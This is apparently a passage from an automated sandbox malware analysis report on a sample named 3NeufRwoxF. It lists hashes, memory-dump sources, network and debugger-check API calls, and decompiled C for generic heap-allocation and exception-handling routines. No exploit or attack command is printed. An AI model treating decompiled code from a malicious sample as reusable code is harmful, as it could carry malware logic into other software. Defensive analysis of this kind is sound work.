Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f70e83446ba8c3f1fd3b299032919dff483a9b5c942b7e6efbec6c10721bd5d1
Instruction ID: 0bc33e61b91e57c30a56116f3478f141168457d3096f0ee639c256f743acb42a
Opcode Fuzzy Hash: f70e83446ba8c3f1fd3b299032919dff483a9b5c942b7e6efbec6c10721bd5d1
Instruction Fuzzy Hash: CE01A271500604ABD214DF1ADC86B22FBA4FB89B20F14811AED484B741E371F516CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0078ABAA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E80,?,?), ref: 0078ABFA

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 206829981ea11fd3ac1cf55ccf0f7a24e4b85c231e41edc4df75af3937bdc8f7
Instruction ID: d9bd1686e2df58a02029801157bd05213dc5923062f766b3e85881ee1bc85ae5
Opcode Fuzzy Hash: 206829981ea11fd3ac1cf55ccf0f7a24e4b85c231e41edc4df75af3937bdc8f7
Instruction Fuzzy Hash: 3301A271500600ABD254DF1ADC86B22FBA4FB89B20F14811AED484B741E231F516CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0078B08A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0078B0BC

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4200bbe137428f32926c773f7f76b9619e2cb13884625f1803e8405f419c067c
Instruction ID: fda0f098dd34839aa42067b356e9c675006d00da2dd69a48208e946678df114e
Opcode Fuzzy Hash: 4200bbe137428f32926c773f7f76b9619e2cb13884625f1803e8405f419c067c
Instruction Fuzzy Hash: 3801DF716443408FDB60DF1AD884752FBA4EF00320F08C0AADC498F686D779E808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0542265A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05422698

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: db16bdb11a577eb0fe93a096d3bb5ccce41ee1e7ec2d8fdb890cc3951cf0e5f9
Instruction ID: 1c4921548b7819badefdb22ee9f88916d342b1809e21f443f141c4aa684ecc7e
Opcode Fuzzy Hash: db16bdb11a577eb0fe93a096d3bb5ccce41ee1e7ec2d8fdb890cc3951cf0e5f9
Instruction Fuzzy Hash: B5018C36504310DFDB20CF55D884BA6FBA1EF14320F08C8AEDD898B616D3B5A458CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05421D82, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?), ref: 05421DB4

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: eb2daba6cd0de933fa788d1e17fd936dbaf9c92aa4c07a1a34da0be1d0928215
Instruction ID: ff2589695590dd4bf513bc783c163622caff22ceefc63aba391fca395fe5457d
Opcode Fuzzy Hash: eb2daba6cd0de933fa788d1e17fd936dbaf9c92aa4c07a1a34da0be1d0928215
Instruction Fuzzy Hash: 0701DF75A00710CFDB60CF2AD8847A6FBA4EF40220F08C4ABDC498F646D679E408CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0078B982, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0078B9BD

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 17c2a50b5290eb86029715b544141dd7cf1004c45e2b354607f5d7519f686e7c
Instruction ID: 3ee327c1170b29c4de800f3031e239bb27ceb055d4aae8784f44565441fbc34b
Opcode Fuzzy Hash: 17c2a50b5290eb86029715b544141dd7cf1004c45e2b354607f5d7519f686e7c
Instruction Fuzzy Hash: 40019E31504340DFDB20DF56D884B62FBA0EF04320F0885AADE894B615D379A408CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078A40A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0078A43C

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 28f44c866fcd17708ccde9447585d7b526897b9bd4dd84d57115fc5ed1403a0a
Instruction ID: e63cf22801e752b6061702504676e684fc4abf40e660060fa4862e2f0e3fc6a5
Opcode Fuzzy Hash: 28f44c866fcd17708ccde9447585d7b526897b9bd4dd84d57115fc5ed1403a0a
Instruction Fuzzy Hash: 0501A2709443809FEB20DF19D888761FBA0EF00320F08C4ABDD488F646D3B9A408CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00403ECE, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00403ECE(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x4132b0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00403829();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00404831())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E004068FD(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00403ece
0x00403ed4
0x00403ed9
0x00403ee7
0x00403ee7
0x00403eed
0x00403eef
0x00403eef
0x00403f06
0x00403f0f
0x00403f17
0x00000000
0x00000000
0x00403ef7
0x00403ef9
0x00403f1b
0x00403f20
0x00403f26
0x00000000
0x00403f26
0x00403efc
0x00403f01
0x00403f02
0x00403f04
0x00000000
0x00000000
0x00403f04
0x00000000
0x00403f06
0x00403edf
0x00403ee5
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004043D5,00000001,00000364,?,?,?,00404836,0040374F,?,00401678,00000000,00000002), ref: 00403F0F

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
Instruction ID: 17ee06be1e01d9d3fac17571a9f3cb3756af6567e7794f1bcf3b52ff780cb40a
Opcode Fuzzy Hash: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
Instruction Fuzzy Hash: BFF0B432904122A6DB216F269C05A6B3F6CEF81772B148537BD04F62D0CB38DE1186ED

Uniqueness

Uniqueness Score: -1.00%

Function 0078A8AA, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0078A8DC

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7c591bc42679553f973342a0931a564c9477a9f5b8a2672958105c811d5709fb
Instruction ID: 23e23907493cd7edb95ec71fdae7896e5db93e074a77e35a2ab60cc8bba3b810
Opcode Fuzzy Hash: 7c591bc42679553f973342a0931a564c9477a9f5b8a2672958105c811d5709fb
Instruction Fuzzy Hash: 4EF081345443449FE7209F06D888761FBA0EF14320F08C0AADD494F656D379A448DBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00403e3d
0x00403e43
0x00403e49
0x00403e7b
0x00403e80
0x00403e86
0x00000000
0x00403e86
0x00403e4d
0x00403e4f
0x00403e4f
0x00403e66
0x00403e6f
0x00403e77
0x00000000
0x00000000
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5c
0x00403e61
0x00403e62
0x00403e64
0x00000000
0x00000000
0x00403e64
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 02370247, Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734312434.0000000002370000.00000040.00000040.sdmp, Offset: 02370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2370000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd902b305fca4ee8dc5cd4e16d4a8cb2d6e52dca6659920a55c1b8213f019c3
Instruction ID: 7f9416f19a4417a01df737cb187155088ec2b5f8323bc283f9e7eef5f0cf64b5
Opcode Fuzzy Hash: 5fd902b305fca4ee8dc5cd4e16d4a8cb2d6e52dca6659920a55c1b8213f019c3
Instruction Fuzzy Hash: 4511EC725097809FD712CB199C459D2BFB8EF46234F08859FED48CB212D225A905CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0540308E, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.735574967.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77041982f788ef16ecdc46e31ed9d69b615de544465e4b37ad6d6e091c539e94
Instruction ID: 009c8bfa9e837d8b88459f477c4fb443d8b295174478d639c9514e77f8e1489e
Opcode Fuzzy Hash: 77041982f788ef16ecdc46e31ed9d69b615de544465e4b37ad6d6e091c539e94
Instruction Fuzzy Hash: C421F875509341AFD351CF29C840A16BFF4EB89664F04899EF888D7352D235E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05402D9A, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.735574967.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4e6a938281e7478a8a057d1726c03c4fe194411dcc628b0a63376f47305fd6f
Instruction ID: 941ce22aeb02b4b8ab9b758f787864a7e0cc8d1881f9479746e6d34411ec69c2
Opcode Fuzzy Hash: c4e6a938281e7478a8a057d1726c03c4fe194411dcc628b0a63376f47305fd6f
Instruction Fuzzy Hash: 4521C8B5608341AFD350CF19D880A5BFBE4FF89664F04896EF888D7311E275E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 023781E8, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734312434.0000000002370000.00000040.00000040.sdmp, Offset: 02370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2370000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af440b77b7e912eada43f09d65c96e23f4a3f26bcc08ed78f1510ec611d77f6
Instruction ID: f6a9cf734b8e8be6bf8226ab97995c3216bdea5ab31340b1cf0de4b622a7d32b
Opcode Fuzzy Hash: 4af440b77b7e912eada43f09d65c96e23f4a3f26bcc08ed78f1510ec611d77f6
Instruction Fuzzy Hash: 09211A3550D7C08FC7138B249855A55BFB1EF47204F2A85DBD4C48B5A3C22A880ADBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0540380C, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.735574967.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1656c961af9ef270b220d0b6f02d8d9d2a86016830bc9d9a7b5e47945c0610e
Instruction ID: 092f4c1599318d863b498a2e9341c74eb7f916825f042ace669b706de681fc82
Opcode Fuzzy Hash: e1656c961af9ef270b220d0b6f02d8d9d2a86016830bc9d9a7b5e47945c0610e
Instruction Fuzzy Hash: 9811BAB5608341AFD350CF19D880A5BFBE4FB88664F04896EF898D7311E231E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 02378124, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734312434.0000000002370000.00000040.00000040.sdmp, Offset: 02370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2370000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17a626341030004d477f9f485d6cafe7fbb3aaf34105bdcbb9c32e394048182
Instruction ID: ff623e600dccae9437c216754a4d5719ab5002846967c401ae87b63d7aa65696
Opcode Fuzzy Hash: a17a626341030004d477f9f485d6cafe7fbb3aaf34105bdcbb9c32e394048182
Instruction Fuzzy Hash: 2511E630204340DFDB25CB14C988B26BBD6EB88718F28C9ACE9491BA43C77FD803DA51

Uniqueness

Uniqueness Score: -1.00%

Function 023780FB, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734312434.0000000002370000.00000040.00000040.sdmp, Offset: 02370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2370000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b6c889748df12ba98278cfc0c1347b4a682bf18ec70212770127f313d6aa54
Instruction ID: 5f2cde67c16f9dff798ec3c1daae593970398077d652287fb205b4b1802d9ac0
Opcode Fuzzy Hash: 31b6c889748df12ba98278cfc0c1347b4a682bf18ec70212770127f313d6aa54
Instruction Fuzzy Hash: 5B21383110D2C18FC717CB14C894B55BFA2AF46208F2985EED8884B6A3C73A8807DB52

Uniqueness

Uniqueness Score: -1.00%

Function 054036B0, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.735574967.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab9eda1d3a9c1f9e718c5ac47b42e5e8b3e78c9bbaea8676c5485555f8a8f21a
Instruction ID: 2349593f7d4234665945fa07ae1b9d6b8f24933ce904bc348671f8e340a66af7
Opcode Fuzzy Hash: ab9eda1d3a9c1f9e718c5ac47b42e5e8b3e78c9bbaea8676c5485555f8a8f21a
Instruction Fuzzy Hash: 0411FEB5608301AFD350CF09DC80A57FBE8FB88660F04892EFD9997311D231E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02370638, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734312434.0000000002370000.00000040.00000040.sdmp, Offset: 02370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2370000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc02a11fa3dbe8bed19572e33444aa4fad96d6f08ed86c2a29755e00e52d386
Instruction ID: a054a64f43eac713b7cb0949ca32ea84d50a59aac113598d0b069210a8bfb04f
Opcode Fuzzy Hash: 2cc02a11fa3dbe8bed19572e33444aa4fad96d6f08ed86c2a29755e00e52d386
Instruction Fuzzy Hash: 5901D47650C7809FC7268F15AC51852BFB4EF42220B1884AFD889CB613E626E909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 023705CF, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734312434.0000000002370000.00000040.00000040.sdmp, Offset: 02370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2370000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00bf982a525069468f826dd3404081094605dbe25202547c4b0b31c900e0d7e8
Instruction ID: 5eacba0c1503c9dec60b5f0303ff1effbefd28ccab3c4dd8109ac0594570ae5f
Opcode Fuzzy Hash: 00bf982a525069468f826dd3404081094605dbe25202547c4b0b31c900e0d7e8
Instruction Fuzzy Hash: 25018B755497806FC711CB15DC40893FFF8EF86231709859FEC898B216D235B519CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 023781E0, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734312434.0000000002370000.00000040.00000040.sdmp, Offset: 02370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2370000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction ID: ab06835ac1efcdd05d37152005d26247ba6f3484620d1baf39608cd8fdff6ebc
Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction Fuzzy Hash: B6F01D35104644DFC716CF04D944B25FBA2EB89718F24C6ADE9491BB52C73BD813DA81

Uniqueness

Uniqueness Score: -1.00%

Function 023705F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734312434.0000000002370000.00000040.00000040.sdmp, Offset: 02370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2370000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1dfa1f9e94bdc83274fd578b322d64900c0649a3adea2495197865d821873c0
Instruction ID: 3f32665c149e639f7a2963232b0c74db9616ee2e6ad432a60f7a35f2e66b7bea
Opcode Fuzzy Hash: e1dfa1f9e94bdc83274fd578b322d64900c0649a3adea2495197865d821873c0
Instruction Fuzzy Hash: 69E092766447009BD650DF0AEC81462FBE4EB84630B18C17FDC4D8B700E636F509CEA6

Uniqueness

Uniqueness Score: -1.00%

Function 05403877, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.735574967.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a58f7fe9d2d121f76bb3967b70fdbeabaa7d5e61e0530beecf9cff41e4a6f61
Instruction ID: 359a3c60b437fae8542b88f96610a2767bf5e319726e779eecdd5e671ebcf8bb
Opcode Fuzzy Hash: 1a58f7fe9d2d121f76bb3967b70fdbeabaa7d5e61e0530beecf9cff41e4a6f61
Instruction Fuzzy Hash: 8FE0D8B26413006BD2609E069C85B22FB98EB90A31F08C56BED081F341E162F5148AE2

Uniqueness

Uniqueness Score: -1.00%

Function 05402E0F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.735574967.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5a10069c553668f379846376439743da5ca736c5e87379f51a816d05452d79
Instruction ID: 99dcfa15d0e2024d58e016aef6f49c3b1f5b67333ac9647fbe4bd7c98f4d8157
Opcode Fuzzy Hash: ba5a10069c553668f379846376439743da5ca736c5e87379f51a816d05452d79
Instruction Fuzzy Hash: 83E0D872A413006BD2609F069C85B22FB58EB90A30F08C56BED081F342E162F5148AE2

Uniqueness

Uniqueness Score: -1.00%

Function 05403123, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.735574967.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34162dd8ba170932b43d8e4103a44f3d43045a6dadc73ccd0345c42e455248be
Instruction ID: 8ee6db80bfecf5913038717292e4d4ca728241d5ec428626ffae7054f9072fc2
Opcode Fuzzy Hash: 34162dd8ba170932b43d8e4103a44f3d43045a6dadc73ccd0345c42e455248be
Instruction Fuzzy Hash: B6E0D8726413006BD2609E069C85B23FB98EB80A30F08C56BED081F305E172F514CAE2

Uniqueness

Uniqueness Score: -1.00%

Function 054036FF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.735574967.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05a2d431d8d549b2565b4f5ca65de79b2862c4230604f26696dadb4e4a46c8af
Instruction ID: 8acf637f860dcd19de614c7febfa0d23446ca88081ac5a711a54c5c976ed346b
Opcode Fuzzy Hash: 05a2d431d8d549b2565b4f5ca65de79b2862c4230604f26696dadb4e4a46c8af
Instruction Fuzzy Hash: 5FE02072641304ABD2609F06AC85F23FB98EB40A30F08C56BED0D1F302E172F5049AF2

Uniqueness

Uniqueness Score: -1.00%

Function 007823F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734023967.0000000000782000.00000040.00000001.sdmp, Offset: 00782000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_782000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2ff6f30d072b81744355d9af2dc4f7c88e0bce98849b88b064d91c6000f1c0c
Instruction ID: 74684f348c8a6d00724c93517a497067463e01588c2f601c862e5d5640b2f227
Opcode Fuzzy Hash: a2ff6f30d072b81744355d9af2dc4f7c88e0bce98849b88b064d91c6000f1c0c
Instruction Fuzzy Hash: A4D05E79344AD14FD3269A1CC1A4B953BD4AB51B05F5684FAA8048B6A7C768DE82D310

Uniqueness

Uniqueness Score: -1.00%

Function 007823BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.734023967.0000000000782000.00000040.00000001.sdmp, Offset: 00782000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_782000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225987d631b8268d998133af577cef1fb92e28a13c1d9f9ab5a40af5eb81d9d0
Instruction ID: 929e67f6c42c521a11d6b0461a5520db3c9cc070a14f4e1ad3224d1121994f06
Opcode Fuzzy Hash: 225987d631b8268d998133af577cef1fb92e28a13c1d9f9ab5a40af5eb81d9d0
Instruction Fuzzy Hash: 20D05E342402824BC716EB0CC2A4F5937D4AB40B01F0644E8BC008BAA6C7BCDC82C700

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0x8dbf8a31
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}

0x0040446f
0x0040446f
0x0040446f
0x0040447a
0x0040447f
0x00404481
0x00404488
0x00404489
0x0040448b
0x0040448e
0x00404493
0x00404493
0x0040449f
0x004044b2
0x004044c0
0x004044c6
0x004044cc
0x004044d2
0x004044d8
0x004044de
0x004044e4
0x004044ea
0x004044f0
0x004044f6
0x004044fd
0x00404504
0x0040450b
0x00404512
0x00404519
0x00404520
0x00404521
0x0040452a
0x00404530
0x00404533
0x00404539
0x00404546
0x0040454f
0x00404558
0x00404561
0x0040456f
0x00404571
0x0040457e
0x00404586
0x00404592
0x00404595
0x0040459a
0x004045a1
0x004045a9

APIs

IsDebuggerPresent.KERNEL32 ref: 00404567
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E

Memory Dump Source

